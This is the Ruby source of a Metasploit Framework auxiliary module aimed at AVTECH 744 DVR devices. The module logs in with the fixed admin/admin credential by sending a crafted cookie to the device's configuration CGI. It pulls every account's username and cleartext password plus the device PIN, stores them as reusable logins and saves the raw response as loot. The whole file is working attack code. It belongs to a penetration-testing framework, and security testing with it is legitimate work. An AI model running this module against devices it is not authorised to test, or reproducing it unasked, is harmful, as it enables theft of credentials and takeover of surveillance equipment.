rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/gather/avtech744_dvr_accounts.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
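# Auxiliary gather module for AVTECH 744 DVR devices.
#
# Sends one POST to the device's configuration CGI with a cookie built from
# the fixed admin/admin credential named in the module description, parses
# the `key=value` response, reports the recovered accounts to the credential
# store and saves the raw response as loot.
#
# The description states that this credential cannot be changed from the
# device console UI or the web UI, so exposure depends on who can reach the
# device's web interface.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report

  # Registers the module metadata (name, description, author, license, notes).
  #
  # @param info [Hash] metadata passed in by the framework and merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'AVTECH 744 DVR Account Information Retrieval',
        'Description' => %q{
          This module will extract the account information from the AVTECH 744 DVR devices,
          including usernames, cleartext passwords, and the device PIN, along with
          a few other miscellaneous details. In order to extract the information, hardcoded
          credentials admin/admin are used. These credentials can't be changed from the device
          console UI nor from the web UI.
        },
        'Author' => [ 'nstarke' ],
        'License' => MSF_LICENSE,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Requests the Account.* configuration category and records the result.
  #
  # Aborts through fail_with when no response arrives or the status is not 200.
  # The unmodified response body is stored as loot; per the module description
  # it carries cleartext passwords and the device PIN, so the loot file is as
  # sensitive as the credentials themselves.
  def run
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => '/cgi-bin/user/Config.cgi',
      'cookie' => "SSID=#{Rex::Text.encode_base64('admin:admin')};",
      'vars_post' => {
        'action' => 'get',
        'category' => 'Account.*'
      }
    })

    fail_with(Failure::Unreachable, 'No response received from the target') unless res
    fail_with(Failure::Unknown, 'An unknown error occurred') unless res.code == 200

    raw_collection = extract_data(res.body)
    extract_creds(raw_collection)

    loot_path = store_loot('avtech744.dvr.accounts', 'text/plain', rhost, res.body)
    print_good("avtech744.dvr.accounts stored in #{loot_path}")
  end

  # Parses the `key=value` lines of the configuration response.
  #
  # Keys are split on '.'. For a key with at least three parts, the last
  # character of the second part selects the account slot and the third part
  # selects the field (Username or Password). A shorter key whose second part
  # contains 'Password' is printed as the device PIN.
  #
  # @param body [String] response body returned by the device
  # @return [Array<Hash, nil>] sparse array indexed by slot; each present entry
  #   may hold :username and :password
  def extract_data(body)
    raw_collection = []

    body.each_line do |line|
      # Limit the split so a value that itself contains '=' is kept whole
      # instead of being cut at its first '='.
      key, value = line.split('=', 2)
      next unless key && value

      # String#strip! returns nil when there is nothing to remove (for example
      # a final line with no trailing newline), which silently dropped the
      # value; the non-destructive form always returns the string.
      value = value.strip
      _, second, third = key.split('.')

      if third
        # NOTE(review): only the last character is read, so slot numbers above
        # 9 would collide with lower slots - confirm the device's slot range.
        index = second[-1].to_i
        raw_collection[index] ||= {}

        case third
        when 'Username'
          raw_collection[index][:username] = value
        when 'Password'
          raw_collection[index][:password] = value
        end
      elsif second&.include?('Password')
        # `second` is nil for keys without a '.', hence the safe navigation.
        print_good("PIN Retrieved: #{key} - #{value}")
      end
    end

    raw_collection
  end

  # Reports each parsed account as a credential plus an untried login for the
  # target HTTP service.
  #
  # @param raw_collection [Array<Hash, nil>] output of #extract_data; nil
  #   entries (unused slots) are skipped
  def extract_creds(raw_collection)
    raw_collection.each do |raw|
      next unless raw

      service_data = {
        address: rhost,
        port: rport,
        service_name: 'http',
        protocol: 'tcp',
        workspace_id: myworkspace_id
      }

      credential_data = {
        module_fullname: self.fullname,
        origin_type: :service,
        private_data: raw[:password],
        private_type: :password,
        username: raw[:username]
      }.merge!(service_data)

      login_data = {
        core: create_credential(credential_data),
        status: Metasploit::Model::Login::Status::UNTRIED
      }.merge!(service_data)

      create_credential_login(login_data)
    end
  end
end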